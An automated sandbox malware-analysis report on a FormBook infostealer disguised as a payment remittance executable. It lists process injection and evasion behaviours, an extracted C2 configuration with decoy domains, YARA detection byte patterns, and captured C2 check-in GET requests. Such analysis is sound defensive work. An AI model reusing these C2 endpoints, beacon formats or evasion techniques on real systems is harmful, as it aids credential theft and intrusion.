Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe

Overview

General Information

Sample Name:Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
Analysis ID:483527
MD5:e29285288905ebb27d9e4443bcaa6638
SHA1:3c656f9257b7630e47f57d1326bceafb7481ab29
SHA256:7027a232f8327a532a1b37586cd42ea73ea0b9c37b1b22334484888f0b13b6b6
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe (PID: 3176 cmdline: 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe' MD5: E29285288905EBB27D9E4443BCAA6638)
    • Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe (PID: 4180 cmdline: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe MD5: E29285288905EBB27D9E4443BCAA6638)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 1392 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • raserver.exe (PID: 3652 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 912 cmdline: /c del 'C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fasilitatortoefl.com/uytf/"], "decoy": ["estherestates.online", "babyballetwigan.com", "ignorantrough.xyz", "moominmamalog.com", "pasticcerialemmi.com", "orangstyle.com", "oldwaterfordfarm.com", "aiiqiuwnsas.com", "youindependents.com", "runbank.net", "phytolipshine.com", "almedmedicalcenter.com", "czxzsa.com", "yummyblockparty.com", "gadgetinfo.info", "cloudfolderplayer.com", "chowding.com", "xn--tarzmbu-ufb.com", "danielaasab.com", "dreampropertiesluxury.com", "itsready.support", "freepoeople.com", "richesosity.online", "covidbrainfogsyndrome.com", "hide.osaka", "fitotec.net", "cdfdwj.com", "vjr.realestate", "knowit.today", "sellhomefastinorlando.com", "permacademy.net", "andhraadvocates.com", "rochainrevsry.xyz", "casino-virtuali.net", "liptondesignstudio.xyz", "keyinternationals.com", "gamifibase.com", "atjehtimur.com", "hobonickelsvillarrubia.com", "johnharrisagent.com", "preabsorb.xyz", "likevietsub38.com", "getrichandsavetheworld.com", "livelife2dance.com", "juesparza.com", "buffalocreekdesign.com", "diegos.xyz", "covidforensicaudit.com", "popitperu.com", "gczvahqeg.site", "aspireship.tech", "freedomforfarmedrabbits.online", "pasalsacongress.com", "custommetalimagery.photography", "managementcoachinginc.com", "hxysjkj.com", "trusticoin.biz", "wireconnectaz.tech", "yoiseikatsu.net", "slggroups.com", "curiousmug.com", "svetarielt.site", "nongormart.com", "btt5204.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bec:$sqlite3step: 68 34 1C 7B E1
        • 0x16b08:$sqlite3text: 68 38 2A 90 C5
        • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
        5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.fasilitatortoefl.com/uytf/"], "decoy": ["estherestates.online", "babyballetwigan.com", "ignorantrough.xyz", "moominmamalog.com", "pasticcerialemmi.com", "orangstyle.com", "oldwaterfordfarm.com", "aiiqiuwnsas.com", "youindependents.com", "runbank.net", "phytolipshine.com", "almedmedicalcenter.com", "czxzsa.com", "yummyblockparty.com", "gadgetinfo.info", "cloudfolderplayer.com", "chowding.com", "xn--tarzmbu-ufb.com", "danielaasab.com", "dreampropertiesluxury.com", "itsready.support", "freepoeople.com", "richesosity.online", "covidbrainfogsyndrome.com", "hide.osaka", "fitotec.net", "cdfdwj.com", "vjr.realestate", "knowit.today", "sellhomefastinorlando.com", "permacademy.net", "andhraadvocates.com", "rochainrevsry.xyz", "casino-virtuali.net", "liptondesignstudio.xyz", "keyinternationals.com", "gamifibase.com", "atjehtimur.com", "hobonickelsvillarrubia.com", "johnharrisagent.com", "preabsorb.xyz", "likevietsub38.com", "getrichandsavetheworld.com", "livelife2dance.com", "juesparza.com", "buffalocreekdesign.com", "diegos.xyz", "covidforensicaudit.com", "popitperu.com", "gczvahqeg.site", "aspireship.tech", "freedomforfarmedrabbits.online", "pasalsacongress.com", "custommetalimagery.photography", "managementcoachinginc.com", "hxysjkj.com", "trusticoin.biz", "wireconnectaz.tech", "yoiseikatsu.net", "slggroups.com", "curiousmug.com", "svetarielt.site", "nongormart.com", "btt5204.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeVirustotal: Detection: 28%Perma Link
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeReversingLabs: Detection: 57%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.302114370.00000000012D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.474783464.0000000000AF0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.302217110.0000000001300000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.477256169.00000000043F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.226787168.0000000003841000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.473607935.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.255057512.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.271535377.000000000E28B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.301308375.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeJoe Sandbox ML: detected
          Source: 5.2.Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.302407881.0000000001390000.00000040.00000001.sdmp, raserver.exe, 00000013.00000002.477861762.000000000484F000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdb source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.301852623.0000000000F59000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.302407881.0000000001390000.00000040.00000001.sdmp, raserver.exe
          Source: Binary string: RAServer.pdbGCTL source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000005.00000002.301852623.0000000000F59000.00000004.00000020.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\HJmNUXoTNN\src\obj\Debug\SerializationHeaderReco.pdb source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
          Source: C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49784 -> 198.54.117.211:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49784 -> 198.54.117.211:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49784 -> 198.54.117.211:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.yummyblockparty.com
          Source: C:\Windows\explorer.exeDomain query: www.fitotec.net
          Source: C:\Windows\explorer.exeDomain query: www.johnharrisagent.com
          Source: C:\Windows\explorer.exeDomain query: www.btt5204.com
          Source: C:\Windows\explorer.exeNetwork Connect: 52.71.133.130 80
          Source: C:\Windows\explorer.exeDomain query: www.hide.osaka
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.211 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.15.104.66 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80
          Source: C:\Windows\explorer.exeDomain query: www.itsready.support
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.fasilitatortoefl.com/uytf/
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewASN Name: GIGABIT-MYGigabitHostingSdnBhdMY GIGABIT-MYGigabitHostingSdnBhdMY
          Source: global trafficHTTP traffic detected: GET /uytf/?4hax=Z6tv0ZGri8uWurB8AUDeWgq8Hn78EURDlDEEMIHUNMQGUG9NVGnXX5+ZYyjQXpOA0JMU&6lE=xT6Pc HTTP/1.1Host: www.yummyblockparty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uytf/?4hax=1GgOydTR9rFB1tFiaPZsKtEWQf/ik/nrf61jzTsng/4mIf33LxMFmIGp7DtpN0+eCTBT&6lE=xT6Pc HTTP/1.1Host: www.johnharrisagent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uytf/?4hax=Lw8pQUl/qe2gQHW8JEklnfX9vlL4ErZAhlphDfsrttl8uYXfrtRE5waSCzthMEOsFHNR&6lE=xT6Pc HTTP/1.1Host: www.itsready.supportConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /uytf/?4hax=0R01lDMz+xXIWoinSyO5qQyNMJHeVacFioz47MHPNe7DMd9wx+TtySfTu0uIVXra7tyR&6lE=xT6Pc HTTP/1.1Host: www.btt5204.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.71.133.130 52.71.133.130
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.226460143.0000000002841000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213161728.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213161728.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com%$I/d
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com9
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comYou
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213196484.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comm
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como..
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comueh
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comva
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213244678.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comy
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213196484.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comypo
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comz
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216127582.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com-O6d
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com.TTFsO
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216064181.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216985898.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216099763.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comS
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comals
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216461639.0000000005F35000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comasF
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.219234603.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comceva
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216127582.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comcomS
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216654283.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comdAO
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216627255.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgritaHO
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.219234603.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgritolOyd
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216654283.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.como
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216064181.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comrsiv
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216654283.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comttF
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comttod
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213011209.0000000005F2D000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212822532.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213011209.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cncz
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213011209.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnly
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217666193.0000000005F2F000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217951742.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217690168.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212488825.0000000005F2D000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krKKd
